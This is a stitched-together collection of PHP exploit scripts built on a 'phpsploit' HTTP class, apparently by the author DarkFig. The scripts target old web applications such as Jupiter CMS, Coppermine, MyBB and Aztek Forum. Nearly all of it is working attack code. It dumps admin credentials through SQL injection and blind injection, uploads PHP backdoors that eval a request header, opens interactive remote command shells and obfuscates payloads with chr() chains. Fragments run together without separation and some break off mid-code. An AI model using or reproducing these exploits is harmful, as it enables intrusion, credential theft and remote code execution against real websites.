function main() { // :) $web = new phpsploit(); $web->agent('Mozilla Firefox'); // Hey ya :) head(); // Target $url = get_p('url', true); // Proxy options $prh = get_p('proxhost'); $pra = get_p('proxauth'); // Use a proxy ? if ($prh) { // host:ip $web->proxy($prh); // Authentication if ($pra) { $web->proxyauth($pra); } } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5(rand(0, 1000000000) . 'HEY_YA'); $c_sep = "print('{$s_sep}');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while (($cmd = cmd_prompt()) !== false) { // magic_quotes_gpc bypass $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");')); // Go =] $web->get($url . 'index.php?fields=' . to_char($final) . ',1'); // Result $res = explode($s_sep, $web->getcontent()); // Erf if (!isset($res[1])) { print "\nFailed"; exit(1); } else { if (empty($res[1])) { print "\nNo output: system() disabled OR cmd failed OR cmd without output"; } else { print "\n" . $res[1]; } } } return; }
# 83. extract($_GET, EXTR_OVERWRITE); # # 106. if (!empty($_COOKIE)) { # 107. if (!$magicquotesGPC) # 108. array_walk($_COOKIE,'addslashes_GPC'); # 109. reset($_COOKIE); # 110. array_walk($_COOKIE,'url_protect'); # 111. extract($_COOKIE, EXTR_OVERWRITE); # # 132. if (!empty($_FILES)) { # 133. while (list($key,$value)=each($_FILES)) { # 134. $$key=$value['tmp_name']; # 135. } # $xpl->get($url . "print.php?_FILES[DB][tmp_name]=links_links%20union%20select%20-1,{$aid},{$pwd},1%20ORDER%20BY%20url%23&lid=1"); if (preg_match("#BEGINUSR(.*)ENDUSR#", $xpl->getcontent(), $aid) and preg_match("#BEGINPWD(.*)ENDPWD#", $xpl->getcontent(), $pwd)) { print "\nAdmin_aid: {$aid['1']}\nAdmin_pwd: {$pwd['1']}"; } else { die("Exploit failed"); } # +auth.inc.php (ADMIN AUTH) # | # 59. if ($admin!="") { # 60. $Xadmin = base64_decode($admin); # 61. $Xadmin = explode(":", $Xadmin); # 62. $aid = urlencode($Xadmin[0]); # 63. $AIpwd = $Xadmin[1]; # 64. if ($aid=="" or $AIpwd=="") { # 65. Admin_Alert("Null Aid or Passwd"); # 66. } # 67. $result=mysql_query("select pwd, radminsuper from authors where aid='$aid'");
/* Title: Jupiter CMS 1.1.5 File Upload Vulnerability Advisory ID: 12070214 Risk level: High Author: DarkFig <*****@*****.**> URL: http://www.acid-root.new.fr/advisories/12070214.txt */ error_reporting(E_ALL ^ E_NOTICE); $url = ' http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>")); $xpl->formdata($arr); $xpl->get($url . 'images/emoticons/iamaphpfile.php'); print $xpl->getcontent(); /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License
| +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =). */ $url = $argv[1]; $prs = $argv[2]; $pra = $argv[3]; $xpl = new phpsploit(); if (!empty($prs)) { $xpl->proxy($prs); } if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1); $name = "phpsploit" . rand(); $xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on"); print "\nsploit> Login/Password -> {$name}"; print "\nstatus> Trying to get database informations"; $xpl->get($url . "forum.php?fid=XD"); if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) { print "\nsploit> Full Path Disclosure -> " . $matches[1];
# # +files.php # | # 42. $action = $_GET['action']; # 43. if($action=="save") { # 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3")); # 46. $upfile = $_FILES[upfile]; # 69. $filepath = "./downloads/"; # 71. $des_file = $filepath.$upfile[name]; # 72. if(!file_exists($des_file)) { # 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) { # print "\nTrying to upload the malicious file"; $frmdt = array(frmdt_url => $url . 'index.php?site=files&action=save', "fileurl" => 1, "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file))); $xpl->formdata($frmdt); if (preg_match("#{$match_upload}#si", $xpl->getcontent())) { print "\nDone"; } else { print "\nFailed"; } print " ({$url}downloads/" . basename($file) . ")\n"; # Simple blind SQL injection (register_globals=On) # # +members.php # | # 31. if($_GET['action']=="show") { # 32. if($_GET['squadID']) { # 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"'; # 34. } # 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort"); #
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)"; print "\nheader> ==============================================="; if (!empty($pxs)) { print "\nstatus> Using a proxy {$pxs}"; $xpl->proxy($pxs); } if (!empty($pxa)) { print "\nstatus> Basic proxy authentification {$pxa}"; $xpl->proxyauth($pxa); } /*/ Table prefix. /*/ print "\nstatus> Searching the version"; $xpl->get($url . 'include/index.html'); if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) { print "\nsploit> Coppermine version " . $matches[1]; } else { print "\nsploit> Not found"; } $table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users'; /*/ If you have the admin cookie (but not the password), replace lines 73=>76 by $xpl->addcookie('yourcookie'); /*/ print "\nstatus> Trying to get logged in"; $xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter"); if (!preg_match("#color:red#", $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nstatus> Exploit failed\n");
* Simple SQL injection (register_globals=off ; magic_quotes_gpc=on). * What we want is not in the database, it's in a file (config.php): * * //this are the logins for the admin part. Change them for security. * $login = "******"; //your login for the admin section. * $pass = "******"; //your login for the admin section. * * PS: Les chr() ont été utilisés dans le but de se foutre de * la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =). * */ $header = chr(0x2f) . chr(0x3c) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x68) . chr(0x65) . chr(0x61) . chr(0x64) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x74) . chr(0x69) . chr(0x74) . chr(0x6c) . chr(0x65) . chr(0x3e) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x66) . chr(0x72) . chr(0x61) . chr(0x6d) . chr(0x65) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x74) . chr(0x69) . chr(0x74) . chr(0x6c) . chr(0x65) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x6c) . chr(0x69) . chr(0x6e) . chr(0x6b) . chr(0x20) . chr(0x68) . chr(0x72) . chr(0x65) . chr(0x66) . chr(0x3d) . chr(0x22) . chr(0x5c) . chr(0x2f) . chr(0x73) . chr(0x74) . chr(0x79) . chr(0x6c) . chr(0x65) . chr(0x2e) . chr(0x63) . chr(0x73) . chr(0x73) . chr(0x22) . chr(0x20) . chr(0x72) . chr(0x65) . chr(0x6c) . chr(0x3d) . chr(0x22) . chr(0x73) . chr(0x74) . chr(0x79) . chr(0x6c) . chr(0x65) . chr(0x73) . chr(0x68) . chr(0x65) . chr(0x65) . chr(0x74) . chr(0x22) . chr(0x20) . chr(0x74) . chr(0x79) . chr(0x70) . chr(0x65) . chr(0x3d) . chr(0x22) . chr(0x74) . chr(0x65) . chr(0x78) . chr(0x74) . chr(0x5c) . chr(0x2f) . chr(0x63) . chr(0x73) . chr(0x73) . chr(0x22) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x6d) . chr(0x65) . chr(0x74) . chr(0x61) . chr(0x20) . chr(0x68) . chr(0x74) . chr(0x74) . chr(0x70) . chr(0x2d) . chr(0x65) . chr(0x71) . chr(0x75) . chr(0x69) . chr(0x76) . chr(0x3d) . chr(0x22) . chr(0x43) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x2d) . chr(0x54) . chr(0x79) . chr(0x70) . chr(0x65) . chr(0x22) . chr(0x20) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x3d) . chr(0x22) . chr(0x74) . chr(0x65) . chr(0x78) . chr(0x74) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3b) . chr(0x20) . chr(0x63) . chr(0x68) . chr(0x61) . chr(0x72) . chr(0x73) . chr(0x65) . chr(0x74) . chr(0x3d) . chr(0x69) . chr(0x73) . chr(0x6f) . chr(0x2d) . chr(0x38) . chr(0x38) . chr(0x35) . chr(0x39) . chr(0x2d) . chr(0x31) . chr(0x22) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x65) . chr(0x61) . chr(0x64) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x62) . chr(0x6f) . chr(0x64) . chr(0x79) . chr(0x3e) . chr(0x2f); $sql = chr(0x70) . chr(0x61) . chr(0x67) . chr(0x65) . chr(0x2e) . chr(0x70) . chr(0x68) . chr(0x70) . chr(0x3f) . chr(0x69) . chr(0x64) . chr(0x3d) . chr(0x2d) . chr(0x31) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x75) . chr(0x6e) . chr(0x69) . chr(0x6f) . chr(0x6e) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x73) . chr(0x65) . chr(0x6c) . chr(0x65) . chr(0x63) . chr(0x74) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6c) . chr(0x6f) . chr(0x61) . chr(0x64) . chr(0x5f) . chr(0x66) . chr(0x69) . chr(0x6c) . chr(0x65) . chr(0x28) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x63) . chr(0x61) . chr(0x74) . chr(0x28) . concatcharfu($file) . chr(0x29) . chr(0x29) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c); $footer = chr(0x2f) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x62) . chr(0x6f) . chr(0x64) . chr(0x79) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3e) . chr(0x2f); $xpl->get($url . $sql); $ct = preg_replace($footer, '', $xpl->getcontent()); print preg_replace($header, '', $ct); function concatcharfu($file) { $dat = ''; for ($i = 0; $i < strlen($file); $i++) { $dat .= 'char(' . ord($file[$i]) . ')'; if ($i != strlen($file) - 1) { $dat .= ','; } } return $dat; } class phpsploit { /**
} print "0x01>Deleting the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); print "\n0x03>Trying to log in as Administrator"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); // Minimum data necessary (fwrite without quote) $minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1'; print "\n0x04>Creating the file config.inc.php"; $xpl->post($url . 'dirsys/modules/config/post.php', $minimdata); print "\n0x05>Now enter your commands"; do { $xpl->addheader('Shell', "@system({$cmd});"); $xpl->get($url . 'dirsys/config.inc.php'); print $xpl->getcontent() . "\n0x06>"; } while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN)))); exit(0); function getparam($param, $opt = '') { global $argv; foreach ($argv as $value => $key) { if ($key == '-' . $param) { return $argv[$value + 1]; } } if ($opt) { usage(); } else { return FALSE; }
# $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. # We can also add an administrator (easily) ... but it's not interesting. # print "\nAdmin IP : "; $ip = sql_inject('ip'); print "\nAdmin sid: "; $sid = sql_inject('sid'); print "\nTrying to be logged in as administrator"; $xpl->addheader('Client-IP', $ip); $xpl->get($url . "admin/languages.php?adminsid={$sid}"); # Trying to find the language if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) { $lang = $langmatches[1]; } else { $lang = 'english'; } print "\nLanguage: {$lang}"; # Language configuration $xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}"); preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value); # We can't use: # - <? OR <?php # - <script language="php"> # - ' OR " # $PHPCODE = '${${error_reporting(0)}}' . '${${$handle=fopen(' . chrit('./' . $backdoor) . ',' . chrit('w') . ')}}' . '${${fwrite($handle,' . chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>') . ')}}' . '${${fclose($handle)}}'; $name_value[2][0] .= $PHPCODE;
if ($mode == 0) { print " * loading uploader\t"; $xpl->addheader("upload", "1"); if (preg_match("#upfiledone#i", $xpl->get($url))) { print "done\n"; } else { $success = false; print "error\n"; } } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; } } /* Reinitialize website name and homepage and erase user avatar */ print " * repairing homepage\t"; $xpl->get('http://myannu.fr/?page=avatars&op=delete&id=1&mode=J'); $postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=accueil&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n"; if ($success) { print "\n * uploader: " . $url . "w00t.php\n"; } function getparam($param, $opt = '') { global $argv;
break; } } if (!$r) { print "[*] Can't find the hash on the net, sorry.\n"; } else { attack($login, $r); die; } } /* --- ATTACK #4: BLIND SQL INJECTION --- */ print "[*] Attack #4\n"; for ($i = 0;; $i++) { $sql = "%2527%20OR%20MID((SELECT%20email%20FROM%20peel_utilisateurs%20WHERE%20priv=%2527admin%2527%20LIMIT%200,1),{$i},1)=123%20/*"; $xpl->get($url . "factures/facture_html.php?mode=facture&id=1×tamp={$sql}/*"); if (!preg_match("#NO HACK#i", $xpl->getcontent())) { print "[*] Attack failed.\n\n"; break; } print "[*] Login:\t"; $login = blind("email", $i); if ($login == "") { if ($i == 0) { print "\r[*] Attack failed.\n\n"; } else { print "\r[*] Attack failed (if you crack a hash, use -admin param).\n\n"; } break; } print "\n[*] Hash:\t"; $passwd = blind("mot_passe", $i);
| $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =] | include($chem_absolu."languages/".$f_language.".".$alex_livre_ext); | | | index.php -> SQL Injection | ========= | ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'"); | // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre` | /*/ $sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) { print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2]; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to get logged in"; $xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification"); if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to add a skin"; // skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755) $xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter"); if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) {
/* Title: Jupiter CMS 1.1.5 SQL Injection Vulnerability Advisory ID: 12070214 Risk level: High Author: DarkFig <*****@*****.**> URL: http://www.acid-root.new.fr/advisories/12070214.txt */ error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #"; $xpl->addheader("Client-IP", $hev); $xpl->get($url); preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr); preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd); print $usr[1] . '::' . $pwd[1]; /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details.
$config[] = 'HAK'; # match, length <= 3 $config[] = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'{$config['3']}0',(SELECT pseudo FROM {$config['0']}_users {$config['2']}),'{$config['3']}0'"; $request[] = "'{$config['3']}1',(SELECT pass FROM {$config['0']}_users {$config['2']}),'{$config['3']}1'"; $request[] = "'{$config['3']}2',(SELECT id FROM {$config['0']}_users {$config['2']}),'{$config['3']}2'"; $request[] = "'{$config['3']}3',(SELECT id FROM {$config['0']}_sessions WHERE user_id=(SELECT id FROM {$config['0']}_users {$config['2']})),'{$config['3']}3'"; for ($i = 0; $i < count($request); $i++) { $deb = rand(0, 10000) . "',2," . (time() + 500000) . ",'',(SELECT CONCAT("; $sql = $deb . $request[$i] . "))) #"; $xpl->addheader("X-Forwarded-For", $sql); $xpl->get($url); $xpl->reset('header'); } if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) { die("Exploit Failed"); } $what = array("login", "passwd", "user_id", "session"); for ($i = 0; $i < count($what); $i++) { print "\n" . $what[$i] . " -> " . $matches[2][$i]; } if (empty($matches[2][3])) { exit("\nNo session found"); } # Logged in as admin $name = array("admin_session", "user_id", "sess_id"); $xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]); $xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]); $xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]); $phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));